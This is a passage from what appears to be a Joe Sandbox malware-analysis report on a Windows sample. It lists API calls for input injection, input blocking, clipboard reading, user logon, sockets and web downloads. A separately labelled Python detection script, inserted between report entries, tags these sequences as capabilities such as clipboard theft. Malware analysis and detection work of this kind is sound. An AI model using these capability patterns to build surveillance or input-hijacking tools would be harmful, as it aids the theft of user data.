                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: KeyboardMessagePostState$InputSend
                                                      • String ID:
                                                      • API String ID: 3031425849-0
                                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                      APIs
                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 4170576061-0
                                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                      APIs
                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                      • IsWindowVisible.USER32 ref: 0047A368
                                                      • IsWindowEnabled.USER32 ref: 0047A378
                                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                      • IsIconic.USER32 ref: 0047A393
                                                      • IsZoomed.USER32 ref: 0047A3A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                      • String ID:
                                                      • API String ID: 15083398-0
                                                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: U$\
                                                      • API String ID: 4104443479-100911408
                                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 901099227-0
                                                      • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                      • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                      APIs
                                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Proc
                                                      • String ID:
                                                      • API String ID: 2346855178-0
                                                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
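The "APIs" lists in the entries above record raw call sequences (the clipboard routine at 0046DCE7, the window-state probe at 0047A368, the WinINet read loop at 0044231E, BlockInput at 0045A38B, LogonUserW at 00436CF9) but do not say which capability each sequence implies. The Python below is an added example, not part of this Joe Sandbox report and not code from the sample: it parses API lines written in the report's own format into per-function call lists (the sample input is constructed from the entries above; "Memory Dump Source" is taken as the line that closes a function's list) and applies ordered rules rather than bare name matches. Clipboard harvesting is only flagged when OpenClipboard precedes a GetClipboardData request for a text format (CF_TEXT = 1 or CF_UNICODETEXT = 0xD, the two argument values the report shows), and BlockInput only when its argument is TRUE (1). The tag names and the rule set are this example's own assumptions, not Joe Sandbox signature names.

```python
import re
from typing import Dict, List, NamedTuple, Set

# Constructed sample in the report's own "APIs" line format, copied from the
# entries above. "Memory Dump Source" marks where one function's list ends.
SAMPLE_REPORT = """\
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Memory Dump Source
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• BlockInput.USER32(00000001), ref: 0045A38B
Memory Dump Source
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Memory Dump Source
"""


class ApiCall(NamedTuple):
    api: str         # e.g. "GetClipboardData"
    module: str      # e.g. "USER32"
    args: List[str]  # arguments as printed ("?" = not resolved by the sandbox)
    ref: str         # call-site address, 8 hex digits
    subcall: bool    # listed as "Part of subcall function ..."


# One API line: "• Api.MODULE(args), ref: ADDR", args optional, optional subcall prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Clipboard format constants from winuser.h; both hold text the user copied.
CF_TEXT = "00000001"
CF_UNICODETEXT = "0000000D"


def parse_functions(report_text: str) -> List[List[ApiCall]]:
    """Split report lines into one call list per function (assumption: the
    'Memory Dump Source' header that follows each APIs list closes it)."""
    functions: List[List[ApiCall]] = []
    current: List[ApiCall] = []
    for line in report_text.splitlines():
        if line.strip() == "Memory Dump Source":
            if current:
                functions.append(current)
            current = []
            continue
        m = API_LINE.match(line)
        if not m:
            continue  # "APIs", "Strings" and other non-call lines
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        current.append(ApiCall(m.group("api"), m.group("module"), args,
                               m.group("ref").upper(), m.group("sub") is not None))
    if current:
        functions.append(current)
    return functions


def classify(calls: List[ApiCall]) -> Set[str]:
    """Map one function's call sequence to capability tags (tag names are
    this example's own, not sandbox signature names)."""
    tags: Set[str] = set()
    names = [c.api for c in calls]

    # Clipboard read: OpenClipboard must come first, and the format requested
    # must be a text format; a bitmap grab or a bare CloseClipboard is ignored.
    if "OpenClipboard" in names:
        first_open = names.index("OpenClipboard")
        for i, c in enumerate(calls):
            if (i > first_open and c.api == "GetClipboardData"
                    and c.args and c.args[0] in (CF_TEXT, CF_UNICODETEXT)):
                tags.add("clipboard_text_read")
                break

    # BlockInput(TRUE) stops keyboard and mouse input reaching other windows;
    # BlockInput(FALSE) merely re-enables it, so the argument matters.
    if any(c.api == "BlockInput" and c.args[:1] == ["00000001"] for c in calls):
        tags.add("blocks_user_input")

    # Visibility / focus probing of a window, as in the 0047A368 routine.
    if {"IsWindowVisible", "GetForegroundWindow", "IsIconic"} <= set(names):
        tags.add("foreground_window_check")

    # WinINet read loop: query pending bytes, then read them.
    if {"InternetQueryDataAvailable", "InternetReadFile"} <= set(names):
        tags.add("wininet_download")

    if "LogonUserW" in names:
        tags.add("logon_with_credentials")
    return tags


def analyze(report_text: str) -> Dict[str, Set[str]]:
    """Return {address of the function's first listed call: tags} for tagged functions."""
    return {calls[0].ref: tags
            for calls in parse_functions(report_text)
            if (tags := classify(calls))}


if __name__ == "__main__":
    for addr, tags in sorted(analyze(SAMPLE_REPORT).items()):
        print(addr, ", ".join(sorted(tags)))
```

Keying results by the first call-site address lets each tag be traced back to the function entry in this report; feeding the full "APIs" sections of a report through `analyze` gives a per-function capability map without relying on the sandbox's own signature names.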
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N@
                                                      • API String ID: 0-1509896676
                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
